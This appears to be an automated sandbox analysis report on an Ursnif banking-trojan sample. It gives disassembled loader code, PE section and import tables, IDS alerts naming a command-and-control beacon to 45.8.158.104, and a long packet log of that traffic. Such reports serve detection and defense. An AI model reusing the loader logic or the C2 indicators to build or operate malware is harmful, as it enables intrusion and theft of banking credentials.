xor esi, esi |
push esi |
push 00400000h |
push esi |
call dword ptr [0040203Ch] |
mov dword ptr [00403160h], eax |
cmp eax, esi |
je 00007F3B38DDEC97h |
push esi |
call dword ptr [00402008h] |
mov dword ptr [00403170h], eax |
call dword ptr [00402044h] |
call 00007F3B38DDE8A9h |
push dword ptr [00403160h] |
mov esi, eax |
call dword ptr [00402040h] |
push esi |
call dword ptr [00402048h] |
pop esi |
push ebp |
mov ebp, esp |
sub esp, 0Ch |
push ebx |
push esi |
mov esi, eax |
mov eax, dword ptr [00403180h] |
mov ecx, dword ptr [esi+3Ch] |
mov ecx, dword ptr [ecx+esi+50h] |
lea edx, dword ptr [eax-69B24F45h] |
not edx |
lea ecx, dword ptr [ecx+eax-69B24F45h] |
push edi |
and ecx, edx |
lea edx, dword ptr [ebp-08h] |
push edx |
lea edx, dword ptr [ebp-04h] |
push edx |
add eax, 964DA0FCh |
push eax |
push ecx |
call 00007F3B38DDEEFDh |
test eax, eax |
jne 00007F3B38DDECCCh |
mov edi, dword ptr [ebp-04h] |
push esi |
push edi |
call 00007F3B38DDEFD3h |
mov ebx, eax |
test ebx, ebx |
jne 00007F3B38DDECA8h |
mov esi, dword ptr [edi+3Ch] |
add esi, edi |
push esi |
call 00007F3B38DDE6F4h |
mov ebx, eax |
test ebx, ebx |
jne 00007F3B38DDEC97h |
push edi |
mov eax, esi |
call 00007F3B38DDF1D4h |
mov ebx, eax |
test ebx, ebx |
jne 00007F3B38DDEC89h |
mov esi, dword ptr [esi+28h] |
push eax |
push 00000001h |
add esi, edi |
push edi |
call esi |
test eax, eax |
jne 00007F3B38DDEC7Ah |
call dword ptr [0000202Ch] |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x20e8 | 0x50 | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5000 | 0x10 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6000 | 0xd8 | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0xa8 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x1000 | 0x1000 | False | 0.718017578125 | data | 6.515539058364033 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x2000 | 0x4c0 | 0x600 | False | 0.4635416666666667 | data | 4.488955985688776 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0x3000 | 0x194 | 0x200 | False | 0.056640625 | data | 0.12227588125913882 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.bss | 0x4000 | 0x2dc | 0x400 | False | 0.7607421875 | data | 6.3016514258390215 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0x5000 | 0x10 | 0x200 | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0x6000 | 0x8000 | 0x7200 | False | 0.9711143092105263 | data | 7.860073249744783 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
DLL | Import |
---|---|
ntdll.dll | _snwprintf, memset, NtQuerySystemInformation, _aulldiv |
KERNEL32.dll | GetModuleHandleA, GetLocaleInfoA, GetSystemDefaultUILanguage, HeapAlloc, HeapFree, WaitForSingleObject, Sleep, ExitThread, lstrlenW, GetLastError, VerLanguageNameA, GetExitCodeThread, CloseHandle, HeapCreate, HeapDestroy, GetCommandLineW, ExitProcess, SetLastError, TerminateThread, SleepEx, GetModuleFileNameW, CreateThread, OpenProcess, CreateEventA, GetLongPathNameW, GetVersion, GetCurrentProcessId, GetProcAddress, LoadLibraryA, VirtualProtect, MapViewOfFile, GetSystemTimeAsFileTime, CreateFileMappingW, QueueUserAPC |
ADVAPI32.dll | ConvertStringSecurityDescriptorToSecurityDescriptorA |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
10/13/22-09:30:54.079674 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
10/13/22-09:30:55.414317 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Oct 13, 2022 09:30:53.924231052 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924268961 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924268961 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924273014 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924312115 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924319029 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924340010 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924360991 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924360991 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924393892 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924402952 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924438000 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924444914 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924482107 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924485922 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924523115 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924526930 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924561977 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924566984 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924606085 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924607992 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924643993 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924649954 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924689054 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924694061 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924729109 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924736023 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924772024 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924777031 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924813032 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924817085 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924853086 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924858093 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924895048 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924899101 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924936056 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924938917 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.924978971 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.924981117 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.925018072 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.925021887 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.925060987 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.925064087 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.925103903 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.925105095 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.925141096 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.925147057 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.925184965 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.925189972 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.925225019 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.925230026 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.925266981 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.925271988 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.925312996 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.925316095 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.925354004 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.925358057 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.925396919 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.938015938 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938082933 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938117027 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.938126087 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938138962 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.938160896 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.938169003 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938201904 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.938210011 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938242912 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.938251972 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938285112 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.938292980 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938325882 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.938335896 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938369036 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.938379049 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938415051 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.938417912 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938451052 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.938458920 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938494921 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.938524961 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938563108 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.938657999 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938694954 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.938771963 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938813925 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938816071 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.938849926 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.938855886 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938925982 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938939095 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.938968897 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.938968897 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.939007998 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.939012051 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.939044952 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.980545998 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.980614901 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.980668068 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.980712891 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.980753899 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.980796099 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.980799913 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.980832100 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.980842113 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.980882883 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.980923891 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.980941057 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.980963945 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.981018066 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.981030941 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.981086016 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.981128931 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.981146097 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.981163979 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.981168985 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.981209040 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.981245995 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.981246948 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.981287003 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.981304884 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.981326103 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.981365919 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.981369019 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:53.981415987 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:53.981451035 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.018419027 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.018639088 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.022754908 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.022804022 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.022846937 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.022860050 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.022891998 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.022891998 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.022911072 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.022948027 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.022972107 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.023001909 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.079674006 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.172065973 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.414618969 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.414688110 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.414752007 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.414769888 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.414797068 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.414834023 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.414834023 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.414840937 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.414859056 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.414923906 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.414927959 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.414963961 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.415007114 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.415045977 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.415049076 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.415088892 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.415102005 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.415102005 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.415112972 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.415235043 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.415235043 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.457063913 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.457129955 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.457161903 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.457195044 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.457237959 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.457278013 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.457319021 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.457350016 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.457367897 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.457391977 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.457432032 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.457434893 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.457454920 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.457479000 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.457505941 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.457514048 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.457557917 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.457567930 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.457600117 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.457623959 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.457642078 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.457674026 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.457689047 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.457726002 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.457772017 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.499522924 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.499586105 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.499625921 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.499653101 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.499653101 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.499665976 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.499712944 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.499715090 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.499715090 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.499754906 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.499768972 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.499799013 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.499804020 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.499840021 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.499845028 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.499882936 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.499886990 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.499919891 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.499932051 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.499960899 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.499967098 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.500003099 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.500011921 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.500041962 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.500062943 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.500073910 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.500101089 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.500113964 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.500140905 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.500157118 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.500185013 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.500200033 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.500226021 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.500231981 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
Oct 13, 2022 09:30:54.500245094 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.500282049 CEST | 49696 | 80 | 192.168.2.5 | 45.8.158.104 |
Oct 13, 2022 09:30:54.542006969 CEST | 80 | 49696 | 45.8.158.104 | 192.168.2.5 |
